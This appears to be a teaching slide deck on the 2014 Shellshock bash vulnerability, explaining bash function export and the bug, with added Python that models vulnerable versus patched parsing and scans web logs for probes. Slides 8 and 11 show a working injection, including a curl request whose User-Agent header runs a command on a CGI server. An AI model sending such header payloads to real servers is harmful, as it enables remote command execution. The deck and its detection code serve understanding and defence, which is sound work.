Shellshock bug
Raashid Muhammed
Understanding the working of Shellshock bug.
1.
Shellshock
2.
Shellshock
Discovered in September 2014. a.k.a. Bashdoor.
Affects Bash.
Causes bash to unintentionally execute any shell command.
The National Institute of Standards & Technology warned that the vulnerability rated 10/10 in terms of severity, impact and exploitability.
3.
The Shock!
On 12th Sept. 2014, Bash maintainer Mr. Chet Ramey is notified of the bug by Stephane Chazelas, an open-source enthusiast.
Within hours Chazelas submits a patch fixing the bug.
Precautions taken before public announcement.
Public announcement on 24th Sept. 2014.
On 27th Sept. 2014, Michal Zalewski from Google discovers other bash vulnerabilities and helps fix them.
4.
"Bash"ing!
Kaspersky Labs detected various DDoS attacks.
Security firm Incapsula noted 17,400 attacks on more than 1,800 web domains.
CloudFlare tracking 1.5 million attacks per day.
DDoS attacks on Akamai Technologies.
Scanning of systems in the U.S. Dept. of Defense.
5.
Bash environment
env command:
    $ var=hello
    $ env
    $ bash
The var variable is not passed to the new bash instance.
The export command allows passing a variable to the spawned child process.
6.
Bash function
    $ foo () { echo "Hello World!"; }
    $ foo
    Hello World!
Bash allows passing functions as an environment variable.
export -f allows passing functions to the spawned child process.
Bash initializes foo as a function after parsing the special variable foo.
7.
Alternate way to export a function
A Bash function can be exported as a variable:
    $ foo='() { echo "Hello World!"; }'
    $ export foo
    $ env
    ...
    foo=() { echo "Hello World!"; }
    $ bash
    $ foo
    Hello World!
8.
The Bug!
    $ bug='() { echo "Hello World!"; }; echo "This is a Bug!"'
    $ export bug
    $ bash
    This is a Bug!
A command concatenated after the function definition is executed during bash initialization!
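The mechanism on slides 5 to 8, as an added example that is not part of the deck: a Python toy model of bash's environment importer, with the pre-patch behaviour (any variable whose value begins with "() {" is taken as a function, and text after the body is executed) beside the hardened one (only a BASH_FUNC_name%% key qualifies, the body must stand alone, and nothing is executed at import time). The parser and the sample environment are simplified constructions, not bash's own code.

```python
import re
# Slide-7 shape of an exported function:  foo=() { echo "Hello World!"; }
# Pre-patch bash treated ANY variable whose value began with "() {" as a function
# and went on parsing, and executing, whatever followed the closing brace (slide 8).
FUNC_PREFIX = re.compile(r"^\(\)\s*\{")

def split_function_import(value):
    """Return (body, trailing_text), or None if value is not a function export.
    Toy parser: brace depth only, no quoting rules; enough for the slide examples."""
    if not FUNC_PREFIX.match(value):
        return None
    depth = 0
    for i, ch in enumerate(value):
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:  # body ends here; anything after it is the dangerous tail
                return value[: i + 1], value[i + 1:].strip().lstrip(";").strip()
    return None  # unterminated body

def vulnerable_import(name, value):
    """Models pre-patch bash: defines the function AND runs the trailing text."""
    parts = split_function_import(value)
    if parts is None:
        return {"defined": None, "executed": ""}
    return {"defined": name, "executed": parts[1]}

def patched_import(name, value):
    """Models fixed bash: only BASH_FUNC_<name>%% keys qualify (so HTTP_USER_AGENT can
    never become a function), the value must be exactly one body, and nothing runs."""
    m = re.fullmatch(r"BASH_FUNC_(\w+)%%", name)
    if not m:
        return {"defined": None, "executed": "", "reason": "not a function-export key"}
    parts = split_function_import(value)
    if parts is None:
        return {"defined": None, "executed": "", "reason": "not a function body"}
    if parts[1]:
        return {"defined": None, "executed": "", "reason": "trailing text after body"}
    return {"defined": m.group(1), "executed": "", "reason": "ok"}

SAMPLE_ENV = {  # constructed sample mirroring slides 8 and 11; values are hypothetical
    "bug": '() { echo "Hello World!"; }; echo "This is a Bug!"',
    "HTTP_USER_AGENT": '() { :;}; echo "Your system has been hacked!" > /tmp/hacker',
    "BASH_FUNC_foo%%": '() { echo "Hello World!"; }',
}

def would_execute(env, importer):
    """Names of the variables from which the given importer would run a command."""
    return sorted(k for k, v in env.items() if importer(k, v)["executed"])
```

Running would_execute(SAMPLE_ENV, vulnerable_import) names both poisoned variables, while the patched importer names none and only defines foo from the BASH_FUNC_foo%% key.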
9.
An example: CGI-based web server
10.
An example: CGI-based web server
CGI script:
    cat > /usr/lib/cgi-bin/bashbug.sh <<EOF
    #!/bin/bash
    echo "Content-type: text/html"
    echo ""
    echo "<h1> CGI Bash Bug Example </h1>"
    EOF
11.
An example: CGI-based web server
Malicious user request:
    $ curl -H 'User-Agent: () { :;}; echo "Your system has been hacked!" > /tmp/hacker' https://localhost/cgi-bin/bashbug.sh
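The request on slide 11 reaches the CGI environment as HTTP_USER_AGENT, so the defender's questions are whether such requests hit the server and whether they can be rejected before the script runs. The following Python is an added example, not part of the deck: it scans Apache combined-format access-log lines for the function-export prefix and provides a CGI-side header check; the log lines, addresses and paths are constructed.

```python
import re
from collections import namedtuple

# A Shellshock probe can ride in any header the CGI handler copies into the
# environment (User-Agent, Referer, Cookie, ...). The tell-tale is the function
# export prefix "() {" at the start of the value, with the space sometimes omitted.
SHELLSHOCK_SIG = re.compile(r"^\s*\(\)\s*\{")

# Apache "combined" log: client, ident, user, [time], "request", status, size,
# "referer", "user-agent". Quoted fields may contain backslash-escaped quotes.
_Q = r'(?:[^"\\]|\\.)*'
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>' + _Q + r')" "(?P<ua>' + _Q + r')"$'
)

Hit = namedtuple("Hit", "ip path field value")

def scan_line(line):
    """Return a Hit if the access-log line carries the signature, else None."""
    m = COMBINED.match(line)
    if not m:
        return None
    for field in ("referer", "ua"):
        value = m.group(field).replace('\\"', '"')  # undo Apache's escaping
        if SHELLSHOCK_SIG.match(value):
            return Hit(m.group("ip"), m.group("path"), field, value)
    return None

def scan_log(lines):
    """Hits for every line; non-matching and malformed lines are skipped."""
    return [h for h in map(scan_line, lines) if h is not None]

def offending_headers(headers):
    """CGI-side guard: names of request headers that carry the signature, checked
    before their values are exported as HTTP_* environment variables."""
    return sorted(n for n, v in headers.items() if SHELLSHOCK_SIG.match(v))

# Constructed sample log lines (hypothetical addresses and paths).
SAMPLE_LOG = r'''
10.0.0.5 - - [25/Sep/2014:10:14:02 +0000] "GET /cgi-bin/bashbug.sh HTTP/1.1" 200 45 "-" "() { :;}; echo \"Your system has been hacked!\" > /tmp/hacker"
10.0.0.9 - - [25/Sep/2014:10:14:07 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Sep/2014:10:15:30 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 500 0 "(){ :;}; echo probe" "curl/7.37.0"
'''.strip().splitlines()
```

scan_log(SAMPLE_LOG) flags the first and third lines, the latter because the prefix arrived in the Referer header with the space omitted.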